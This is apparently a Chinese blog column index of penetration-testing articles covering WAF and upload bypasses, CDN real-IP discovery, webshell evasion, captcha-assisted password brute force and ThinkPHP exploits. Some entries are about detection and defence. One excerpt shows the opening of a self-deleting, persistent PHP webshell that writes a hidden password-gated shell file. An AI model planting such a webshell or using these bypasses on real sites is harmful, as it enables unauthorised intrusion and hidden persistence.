渗透测试
文章平均质量分 83
此专栏全方位详细的渗透测试课程讲解,讲解包括了整个渗透测试的流程和所有知识点,包含知识点与靶场相结合的训练,详细的介绍了外网打点到获取shell的各种漏洞复现和各种漏洞的介绍,对于初学渗透测试的小伙伴们有极大的帮助,也是博主历时三年的时间打造出来的,供自己复习和初学者学习的珍贵资料,大家好好学习噢。
炫彩@之星
喜爱渗透测试,喜爱网络安全。网安领域十几年的行业经验,多次参加过hw攻防演练,对安全有深度的了解,有喜欢渗透测试和网安的小哥哥和小姐姐可以一起学习和讨论哦。
展开
-
干货 | 最全的文件上传漏洞之WAF拦截绕过总结
干货 | 最全的文件上传漏洞之WAF拦截绕过总结原创 2024-09-29 01:48:44 · 545 阅读 · 0 评论 -
渗透测试-WAF的识别、检测、绕过原理与实战案例
渗透测试-WAF的识别、检测、绕过原理与实战案例原创 2024-09-29 01:23:51 · 1297 阅读 · 0 评论 -
渗透测试-文件上传绕过思路
渗透测试-文件上传绕过思路原创 2024-09-27 17:09:23 · 731 阅读 · 0 评论 -
渗透测试--文件上传常用绕过方式
渗透测试--文件上传常用绕过方式原创 2024-09-27 16:34:51 · 1803 阅读 · 0 评论 -
网络空间搜索引擎- FOFA的使用技巧总结
网络空间搜索引擎- FOFA的使用技巧总结原创 2024-09-25 18:30:29 · 2090 阅读 · 0 评论 -
Fofa搜索技巧(理论加实践的整理)
Fofa搜索技巧(理论加实践的整理)原创 2024-09-21 23:12:30 · 485 阅读 · 0 评论 -
浅谈WAF绕过技巧
渗透测试--浅谈WAF绕过技巧原创 2024-09-05 20:20:04 · 913 阅读 · 0 评论 -
渗透测试-信息收集篇
渗透测试-信息收集篇原创 2024-09-05 17:51:25 · 1149 阅读 · 0 评论 -
近源渗透--“千里之堤,溃于蚁穴”,
近源渗透--“千里之堤,溃于蚁穴”原创 2024-08-28 09:59:42 · 509 阅读 · 0 评论 -
渗透测试-nmap常用的漏扫命令
渗透测试-nmap常用的漏扫命令原创 2024-07-11 14:40:31 · 4099 阅读 · 0 评论 -
渗透测试-冰蝎、菜刀,蚁剑、哥斯拉的流量特征
渗透测试-冰蝎、菜刀,蚁剑、哥斯拉的流量特征原创 2024-06-16 21:01:46 · 1471 阅读 · 1 评论 -
渗透测试-Wireshark的一些常用命令
渗透测试-Wireshark的一些常用命令原创 2024-06-16 19:32:02 · 594 阅读 · 0 评论 -
渗透测试-一文了解命令执行漏洞和代码执行漏洞
渗透测试-一文了解命令执行漏洞和代码执行漏洞原创 2024-04-23 14:10:39 · 2067 阅读 · 1 评论 -
渗透测试-一文了解csrf漏洞
渗透测试-一文了解csrf漏洞原创 2024-04-23 12:35:36 · 1618 阅读 · 0 评论 -
渗透测试-网站有cdn怎么办?
渗透测试-网站有cdn怎么办?原创 2024-04-22 01:26:57 · 371 阅读 · 0 评论 -
渗透测试-XFF漏洞攻击原理及防御方案
渗透测试-XFF漏洞攻击原理及防御方案原创 2024-04-15 00:43:03 · 3856 阅读 · 0 评论 -
渗透测试-一次完整的渗透测试流程
一次完整的渗透测试流程 目录 渗透测试 信息收集 漏洞探测 漏洞利用 内网转发 内网渗透 痕迹清除 撰写渗透测试保告 Web基础安全培训:红队培训之Web基础安全 渗透测试 渗透测试就是利用我们所掌握的渗透知识,对网站进行一步一步的渗透,发现其中存在的漏洞和隐藏的风险,然后撰写一篇测试报告,提供给我们的客户。客户根据我们撰写的测试报告,对网站进行漏洞修补,以防止黑客的入转载 2022-08-25 07:54:05 · 528 阅读 · 0 评论 -
渗透测试-一些webshell免杀的技巧
渗透测试-一些webshell免杀的技巧原创 2022-12-16 11:20:10 · 1971 阅读 · 5 评论 -
渗透测试-crlf注入原理
渗透测试-crlf注入原理原创 2022-12-16 11:26:54 · 2667 阅读 · 4 评论 -
渗透测试-sqlmap提权
渗透测试-sqlmap提权原创 2022-12-16 11:24:50 · 2384 阅读 · 0 评论 -
渗透测试-XSS、CSRF原理及防御
渗透测试-XSS、CSRF原理及防御原创 2022-10-07 12:23:41 · 3591 阅读 · 0 评论 -
冰蝎4.0特征分析及流量检测思路
冰蝎4.0特征分析及流量检测思路文章目录冰蝎4.0特征分析及流量检测思路冰蝎4.0介绍1、新版本2、工具通信原理特征检测Accept字段Content-TypeUser-agent 字段4、端口5、PHP webshell 中存在固定代码6、长连接7、固定的请求头和响应头8、连接密码9、webshell特征10、请求和响应冰蝎4.0介绍冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端。老牌Webshell管理神器——中国菜刀的攻击流量特征明显,容易被各类安全设备检测,实际场景中原创 2022-10-10 13:16:42 · 4203 阅读 · 3 评论 -
渗透测试-11种绕过CDN查找真实IP的方法
11种绕过CDN查找真实IP方法文章目录11种绕过CDN查找真实IP方法验证是否存在CDN方法1方法2绕过 CDN 查找网站真实 IP查询历史DNS记录查询子域名网络空间引擎搜索法利用SSL证书寻找真实原始IP利用HTTP标头寻找真实原始IP利用网站返回的内容寻找真实原始IP使用国外主机解析域名网站漏洞查找网站邮件订阅查找用 Zmap 扫全网F5 LTM解码法验证是否存在CDN方法1很简单,使用各种多地 ping 的服务,查看对应 IP 地址是否唯一,如果不唯一多半是使用了CDN, 多地 Ping原创 2022-10-10 13:16:06 · 4952 阅读 · 0 评论 -
渗透测试-查找真实ip
渗透测试-查找真实ip的方法集合,利于对目标进行进一步的渗透测试。原创 2022-10-10 13:15:43 · 2699 阅读 · 2 评论 -
关于上传中的00截断分析
关于上传中的00截断分析关于上传中00截断的细节,很多朋友在渗透中都会发现一些这样的有趣现象,这个站点使用00截断上传的方法上传成功了,而换一个站点又失败了,这是什么原因呢?你看了这篇文章就会明白。00截断原理0x00是字符串的结束标识符,攻击者可以利用手动添加字符串标识符的方式来将后面的内容进行截断,而后面的内容又可以帮助我们绕过检测。00截断的限制条件PHP<5.3.29,且GPC关闭00截断的利用方法上传文件后缀检测代码$uploaded_name = $_FILES[ ‘f原创 2022-10-10 13:14:15 · 2158 阅读 · 0 评论 -
冰蝎的前世今生:3.0新版本下的一些防护思考
冰蝎的前世今生 冰蝎(Behinder)是国内黑客圈较火的一款Webshell管理工具。在今年HW开始前,冰蝎突然进行了3.0版本的发布,新版本修改了不少旧版本的流量特征,导致大量WAF、HIDS、Webshell检测工具失效。 本文将详细揭秘冰蝎的前世今生,以及对于冰蝎相关攻击的检测思路和3.0新版本下的防护思考。 冰蝎的前世 在冰蝎这个工具出现以前,中国菜刀一直是国内的白帽子、黑帽子、各种帽子常用的Webshell管理工具。而冰蝎出现以后,很快就被大量攻击者所接受,取代了菜刀的地位。原创 2022-10-07 12:29:16 · 2479 阅读 · 0 评论 -
渗透测试-不死马的创建和查杀
不死马的创建和查杀文章目录不死马的创建和查杀0x00 创建0x01 查看0x02 查杀root用户角度的查杀:重启web服务。其他用户的查杀:0x00 创建md5加密密码:代码:<?php ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);$file = '.shell.php';$code = '<?php if(md5($_GET["pass"])=="2591c98b70119fe624898b1e4原创 2022-09-01 13:57:40 · 2452 阅读 · 0 评论 -
渗透测试-Kali Linux 正确清理垃圾的姿势
Kali Linux 正确清理垃圾的姿势文章目录Kali Linux 正确清理垃圾的姿势前言安装多彩的仪表盘可视化的垃圾扫描进程管理开机启动管理可视化软件卸载系统源管理利用命令清理垃圾卸载软件前言原创 2022-08-29 23:59:06 · 3862 阅读 · 0 评论 -
渗透测试-Burp识别验证码暴破密码
Burp识别验证码暴破密码文章目录Burp识别验证码暴破密码1、下载插件和服务代码2、安装Burp插件3、获取验证码4、本地服务识别验证码5、抓取登录包暴破1、下载插件和服务代码地址:https://github.com/f0ng/captcha-killer-modified/releases该项目基于captcha-killer(https://github.com/c0ny1/captcha-killer)修改,可以用于2021-2022的Burp Suite。其中jar文件是Burp原创 2022-08-31 16:13:52 · 1951 阅读 · 9 评论 -
渗透测试-信息收集思路&工具分享
信息收集思路&工具分享信息收集企查查-爱企查-天眼查获取公司及子公司信息域名小程序微信公众号APP微博邮箱生活号https://github.com/cqkenuo/appinfoscannerhttps://www.qcc.com/https://www.tianyancha.com/https://aiqicha.baidu.com/google.com \ baidu.com \ bing.cn收集子域名收集目标子域名信息https://x.t原创 2022-08-30 00:00:21 · 846 阅读 · 0 评论 -
渗透测试-2022红队必备工具列表总结
2022红队必备工具列表总结文章目录2022红队必备工具列表总结一、信息收集二、漏洞扫描三、网站管理四、在线工具一、信息收集1、AppInfoScanner一款适用于以HVV行动/红队/渗透测试团队为场景的移动端(Android、iOS、WEB、H5、静态网站)信息收集扫描工具,可以帮助渗透测试工程师、红队成员快速收集到移动端或者静态WEB站点中关键的资产信息并提供基本的信息输出,如:Title、Domain、CDN、指纹信息、状态信息等。https://github.com/kelvinBe原创 2022-08-29 23:59:53 · 1325 阅读 · 0 评论 -
渗透测试-过D盾一句话+上传小马
过D盾一句话+上传小马文章目录过D盾一句话+上传小马前言方式一PHP一句话马方式二PHP上传小马前言webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。方式一PHP一句话马1.代码<?php class原创 2022-08-29 23:58:13 · 1486 阅读 · 0 评论 -
渗透测试-渗透中403/401页面绕过的思路总结
渗透中403/401页面绕过的思路总结文章目录渗透中403/401页面绕过的思路总结0x01 前言0x02 利用姿势1.端口利用2.修改HOST3.覆盖请求URL4.Referer标头绕过5.代理IP6.扩展名绕过7.扫描的时候8.最后补充再一些401和403 bypass的tips0x01 前言做渗透时经常会碰到扫到的资产403的情况,特别是资产微乎其微的情况下,面试有时也会问到,这里做个总结!0x02 利用姿势1.端口利用扫描主机端口,找其它开放web服务的端口,访问其端口,挑软柿子。2原创 2022-08-29 23:58:50 · 5692 阅读 · 0 评论 -
渗透测试-基于浏览器的口令暴破与图形验证码识别
基于浏览器的口令暴破与图形验证码识别文章目录基于浏览器的口令暴破与图形验证码识别前言Playwright:浏览器自动化工具Playwright:滑动验证码案例生成登录流程代码ddddocr:Python 验证码识别库前言随着网络安全水平的发展,越来越多的网站增加了 RSA 加密、图形验证码等防护手段,传统的口令暴破方式已捉襟见肘,如果高效、低代码的进行口令暴破?本文将介绍一个操作浏览器进行口令暴破的案例与验证码识别工具。Playwright:浏览器自动化工具Playwright 是一个强大的 Py原创 2022-08-28 20:28:03 · 1764 阅读 · 0 评论 -
渗透测试-ThinkPHP框架漏洞总结
ThinkPHP框架漏洞总结文章目录ThinkPHP框架漏洞总结前言Thinkphp简介Thinkphp本地安装Thinkphp本地复现验证poc写入一句话Vulhub-Thinkphp复现Thinkphp 2.x 任意代码执行漏洞Thinkphp5-5.0.22/5.1.29远程执行代码漏洞Thinkphp5.0.23远程代码执行漏洞Thinkphp5 SQL注入漏洞和敏感信息泄露漏洞Thinkphp自动化武器Thinkphp综合利用工具1.上传图片马2.审查元素,找到图片马路径3.开始备原创 2022-08-26 00:53:42 · 2928 阅读 · 1 评论 -
渗透测试-逻辑漏洞测试挖掘总结
逻辑漏洞文章目录逻辑漏洞前言一丶漏洞介绍二丶常见场景三丶漏洞情景1)登录验证码爆破2)凭证返回3)验证码绕过4)短信轰炸5)session覆盖6)逻辑越权7)换绑手机,密码重置8)支付类逻辑四丶总结前言因为最近接触的逻辑漏洞挺多的,所以想把自己的个人在实战中的经验总结一下,可能总结的不全,但是都是我自己实战中遇到的。因为逻辑漏洞是那些扫描器扫不出来的,所以挖起来会比较轻松,像那些注入基本都被挖空了。一丶漏洞介绍业务逻辑漏洞是指由于程序逻辑不严谨或逻辑太复杂,导致一些逻辑分支不能正常处理或处理错误。原创 2022-08-25 07:56:00 · 1141 阅读 · 0 评论 -
渗透测试-一文读懂XSS、CSRF、SSRF、XXE漏洞原理、应用、防御
一文读懂XSS、CSRF、SSRF、XXE漏洞原理、应用、防御文章目录一文读懂XSS、CSRF、SSRF、XXE漏洞原理、应用、防御一、相同点与不同点相同点不同点XXE漏洞二、防御1、XSS2、CSRF3、SSRF4、XXE三、面试题一、相同点与不同点相同点XSS,CSRF,SSRF三种常见的Web服务端漏洞均是由于,服务器端对用户提供的可控数据过于信任或者过滤不严导致的。不同点XSS是服务器对用户输入的数据没有进行足够的过滤,导致客户端浏览器在渲染服务器返回的html页面时,出现了预期值之外的原创 2022-08-25 07:55:37 · 2978 阅读 · 0 评论
分享